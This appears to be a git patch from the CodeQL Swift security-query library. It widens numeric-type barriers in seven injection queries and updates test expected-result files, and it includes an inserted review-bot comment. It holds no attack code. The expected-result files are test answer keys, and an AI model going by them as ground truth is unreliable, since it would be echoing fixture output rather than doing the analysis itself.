@@ -54,15 +103,33 @@ nodes | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths #select +| rncryptor.swift:62:57:62:57 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:62:57:62:57 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:64:55:64:55 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:64:55:64:55 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:67:106:67:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:106:67:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:67:131:67:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:67:131:67:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ 
| | rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:68:133:68:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:68:133:68:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:69:106:69:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:69:106:69:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:70:106:70:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:106:70:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:70:131:70:131 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:70:131:70:131 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. 
| rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:71:133:71:133 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:71:133:71:133 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:72:106:72:106 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:72:106:72:106 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:74:127:74:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:127:74:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:74:152:74:152 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:74:152:74:152 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:75:154:75:154 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ 
| rncryptor.swift:75:154:75:154 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:76:127:76:127 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:76:127:76:127 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:77:135:77:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:135:77:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | +| rncryptor.swift:77:160:77:160 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:77:160:77:160 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:78:162:78:162 | myRandomSalt2 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:78:162:78:162 | myRandomSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ 
| +| rncryptor.swift:79:135:79:135 | myRandomSalt1 | rncryptor.swift:47:16:47:16 | ................ | rncryptor.swift:79:135:79:135 | myRandomSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:47:16:47:16 | ................ | ................ | | rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | | test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | | test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | From e589b1fcd059bca1c7f075b4722a610000d25caa Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 14 Nov 2024 17:37:43 +0000 Subject: [PATCH 0702/1267] Swift: Fix query barriers. --- .../security/CommandInjectionExtensions.qll | 2 +- .../security/PredicateInjectionExtensions.qll | 2 +- .../swift/security/SqlInjectionExtensions.qll | 2 +- .../UncontrolledFormatStringExtensions.qll | 2 +- .../swift/security/UnsafeJsEvalExtensions.qll | 2 +- .../swift/security/UnsafeUnpackExtensions.qll | 2 +- .../regex/RegexInjectionExtensions.qll | 2 +- .../Security/CWE-089/SqlInjection.expected | 14 ----------- .../Security/CWE-094/UnsafeJsEval.expected | 23 ------------------- .../CWE-134/UncontrolledFormatString.expected | 21 ----------------- 10 files changed, 7 insertions(+), 65 deletions(-) 
diff --git a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll
index b1fd734440b..55391bd3378 100644
--- a/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/CommandInjectionExtensions.qll
@@ -63,6 +63,6 @@ private class CommandInjectionSinks extends SinkModelCsv {
 private class CommandInjectionDefaultBarrier extends CommandInjectionBarrier {
 CommandInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll
index 9e5a8a8e57b..1ff8b97a281 100644
--- a/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/PredicateInjectionExtensions.qll
@@ -46,6 +46,6 @@ private class PredicateInjectionSinkCsv extends SinkModelCsv {
 private class PredicateInjectionDefaultBarrier extends PredicateInjectionBarrier {
 PredicateInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll
index 1437e67dc21..0ecc24a178e 100644
--- a/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/SqlInjectionExtensions.qll
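Review bot: The comment `// any numeric type` above the changed line in `CommandInjectionDefaultBarrier` no longer explains the check: `getABaseType*()` is already transitive and Swift's `SignedInteger`/`UnsignedInteger` refine `Numeric`, so a reader cannot tell why the two names had to be added. I would extend it to something like `// any numeric type; the integer protocols are named explicitly because the base-type walk does not always reach Numeric` (the reason is my guess and should be confirmed by the author). The same line is repeated in the six other barrier hunks of this commit (PredicateInjection, SqlInjection, UncontrolledFormatString, UnsafeJsEval, UnsafeUnpack, RegexInjection), so one shared predicate holding the name list would keep the seven barriers from drifting apart. Floating-point types are still matched only through the `Numeric` entry, so if that walk is what failed for integers, a `Double` conversion case in the tests would show whether they are still treated as safe.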
@@ -190,6 +190,6 @@ private class DefaultSqlInjectionSink extends SqlInjectionSink {
 private class SqlInjectionDefaultBarrier extends SqlInjectionBarrier {
 SqlInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll
index b114f72f215..eb44f6894b9 100644
--- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll
@@ -94,6 +94,6 @@ class HeuristicUncontrolledFormatStringSink extends UncontrolledFormatStringSink
 private class UncontrolledFormatStringDefaultBarrier extends UncontrolledFormatStringBarrier {
 UncontrolledFormatStringDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll
index 3eb65e6460f..923449f4d73 100644
--- a/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/UnsafeJsEvalExtensions.qll
@@ -127,6 +127,6 @@ private class DefaultUnsafeJsEvalSink extends UnsafeJsEvalSink {
 private class UnsafeJsEvalDefaultBarrier extends UnsafeJsEvalBarrier {
 UnsafeJsEvalDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll
index c102aa40a1e..1df4a06417b 100644
--- a/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/UnsafeUnpackExtensions.qll
@@ -73,6 +73,6 @@ private class UnsafeUnpackAdditionalDataFlowStep extends UnsafeUnpackAdditionalF
 private class UnsafeUnpackDefaultBarrier extends UnsafeUnpackBarrier {
 UnsafeUnpackDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll
index d95bcc212bf..09c4641cbf0 100644
--- a/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll
+++ b/swift/ql/lib/codeql/swift/security/regex/RegexInjectionExtensions.qll
@@ -64,6 +64,6 @@ private class RegexInjectionSinks extends SinkModelCsv {
 private class RegexInjectionDefaultBarrier extends RegexInjectionBarrier {
 RegexInjectionDefaultBarrier() {
 // any numeric type
- this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = "Numeric"
+ this.asExpr().getType().getUnderlyingType().getABaseType*().getName() = ["Numeric", "SignedInteger", "UnsignedInteger"]
 }
 }
diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected
index 9824b5c8e17..36ebcd04a6e 100644
--- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected
+++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected
@@ -82,7 +82,6 @@ edges | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:349:84:349:84 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:350:69:350:69 | remoteString | provenance | | | GRDB.swift:342:26:342:80 | call to String.init(contentsOf:) | GRDB.swift:351:84:351:84 | remoteString | provenance | | -| SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:63:25:63:25 | remoteString | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | provenance | | @@ -98,8 +97,6 @@ edges | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:117:16:117:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:119:16:119:16 | unsafeQuery1 | provenance | | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:132:20:132:20 | remoteString | provenance | | -| SQLite.swift:63:21:63:37 | call to Self.init(_:) | SQLite.swift:77:17:77:17 | safeQuery2 | provenance | | -| SQLite.swift:63:25:63:25 | remoteString | SQLite.swift:63:21:63:37 | call to Self.init(_:) | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:50:22:50:22 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:52:14:52:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:53:14:53:14 | remoteString | provenance | | 
@@ -107,7 +104,6 @@ edges | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:55:14:55:14 | remoteString | provenance | | | other.swift:46:25:46:79 | call to String.init(contentsOf:) | other.swift:57:16:57:16 | remoteString | provenance | | | other.swift:54:31:54:31 | remoteString | other.swift:54:14:54:43 | call to NSString.init(string:) | provenance | | -| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:123:25:123:25 | remoteString | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | provenance | | 
@@ -115,8 +111,6 @@ edges | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | provenance | | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | provenance | | -| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | provenance | | -| sqlite3_c_api.swift:123:25:123:25 | remoteString | sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | provenance | | | sqlite3_c_api.swift:189:13:189:13 | unsafeQuery3 | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | provenance | | | sqlite3_c_api.swift:189:13:189:58 | call to data(using:allowLossyConversion:) | sqlite3_c_api.swift:190:2:190:2 | data | provenance | | | sqlite3_c_api.swift:190:2:190:2 | data | sqlite3_c_api.swift:190:21:190:21 | [post] buffer | provenance | | 
@@ -220,12 +214,9 @@ nodes | GRDB.swift:350:69:350:69 | remoteString | semmle.label | remoteString | | GRDB.swift:351:84:351:84 | remoteString | semmle.label | remoteString | | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | -| SQLite.swift:63:21:63:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| SQLite.swift:63:25:63:25 | remoteString | semmle.label | remoteString | | SQLite.swift:73:17:73:17 | unsafeQuery1 | semmle.label | unsafeQuery1 | | SQLite.swift:74:17:74:17 | unsafeQuery2 | semmle.label | unsafeQuery2 | | SQLite.swift:75:17:75:17 | unsafeQuery3 | semmle.label | unsafeQuery3 | -| SQLite.swift:77:17:77:17 | safeQuery2 | semmle.label | safeQuery2 | | SQLite.swift:83:29:83:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | SQLite.swift:95:32:95:32 | remoteString | semmle.label | remoteString | | SQLite.swift:100:29:100:29 | unsafeQuery1 | semmle.label | unsafeQuery1 | 
@@ -247,12 +238,9 @@ nodes | other.swift:55:14:55:14 | remoteString | semmle.label | remoteString | | other.swift:57:16:57:16 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | -| sqlite3_c_api.swift:123:21:123:37 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| sqlite3_c_api.swift:123:25:123:25 | remoteString | semmle.label | remoteString | | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | semmle.label | unsafeQuery1 | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | semmle.label | unsafeQuery2 | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | semmle.label | unsafeQuery3 | -| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | semmle.label | safeQuery2 | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | semmle.label | unsafeQuery3 | 
@@ -351,7 +339,6 @@ subpaths | SQLite.swift:73:17:73:17 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:73:17:73:17 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:74:17:74:17 | unsafeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:74:17:74:17 | unsafeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:75:17:75:17 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:75:17:75:17 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | -| SQLite.swift:77:17:77:17 | safeQuery2 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:77:17:77:17 | safeQuery2 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:83:29:83:29 | unsafeQuery3 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:83:29:83:29 | unsafeQuery3 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:95:32:95:32 | remoteString | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:95:32:95:32 | remoteString | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | | SQLite.swift:100:29:100:29 | unsafeQuery1 | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | SQLite.swift:100:29:100:29 | unsafeQuery1 | This query depends on a $@. | SQLite.swift:62:25:62:79 | call to String.init(contentsOf:) | user-provided value | 
@@ -373,7 +360,6 @@ subpaths | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:133:33:133:33 | unsafeQuery1 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:134:33:134:33 | unsafeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:135:33:135:33 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | -| sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:137:33:137:33 | safeQuery2 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:145:26:145:26 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:175:29:175:29 | unsafeQuery3 | This query depends on a $@. 
| sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | sqlite3_c_api.swift:183:29:183:29 | unsafeQuery3 | This query depends on a $@. | sqlite3_c_api.swift:122:26:122:80 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected index 64a65dd1a54..cfd68d818ef 100644 --- a/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected +++ b/swift/ql/test/query-tests/Security/CWE-094/UnsafeJsEval.expected 
@@ -30,17 +30,6 @@ edges | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | | UnsafeJsEval.swift:214:24:214:24 | remoteData | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:265:13:265:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:268:13:268:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:276:13:276:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:279:13:279:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:285:13:285:13 | string | provenance | | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | UnsafeJsEval.swift:299:13:299:13 | string | provenance | | -| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | provenance | | -| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | provenance | | -| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | provenance | | -| UnsafeJsEval.swift:217:35:217:63 | try! ... | UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | provenance | | -| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | UnsafeJsEval.swift:217:35:217:63 | try! ... 
| provenance | | | UnsafeJsEval.swift:265:13:265:13 | string | UnsafeJsEval.swift:266:43:266:43 | string | provenance | | | UnsafeJsEval.swift:266:43:266:43 | string | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | provenance | | | UnsafeJsEval.swift:268:13:268:13 | string | UnsafeJsEval.swift:269:43:269:43 | string | provenance | | @@ -74,12 +63,6 @@ nodes | UnsafeJsEval.swift:211:30:211:53 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:214:7:214:49 | call to String.init(decoding:as:) | semmle.label | call to String.init(decoding:as:) | | UnsafeJsEval.swift:214:24:214:24 | remoteData | semmle.label | remoteData | -| UnsafeJsEval.swift:217:7:217:74 | ... .+(_:_:) ... | semmle.label | ... .+(_:_:) ... | -| UnsafeJsEval.swift:217:24:217:70 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| UnsafeJsEval.swift:217:31:217:64 | call to Self.init(_:) | semmle.label | call to Self.init(_:) | -| UnsafeJsEval.swift:217:31:217:69 | ... ??(_:_:) ... | semmle.label | ... ??(_:_:) ... | -| UnsafeJsEval.swift:217:35:217:63 | try! ... | semmle.label | try! ... | -| UnsafeJsEval.swift:217:40:217:63 | call to String.init(contentsOf:) | semmle.label | call to String.init(contentsOf:) | | UnsafeJsEval.swift:265:13:265:13 | string | semmle.label | string | | UnsafeJsEval.swift:266:22:266:107 | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | semmle.label | call to WKUserScript.init(source:injectionTime:forMainFrameOnly:) | | UnsafeJsEval.swift:266:43:266:43 | string | semmle.label | string | 
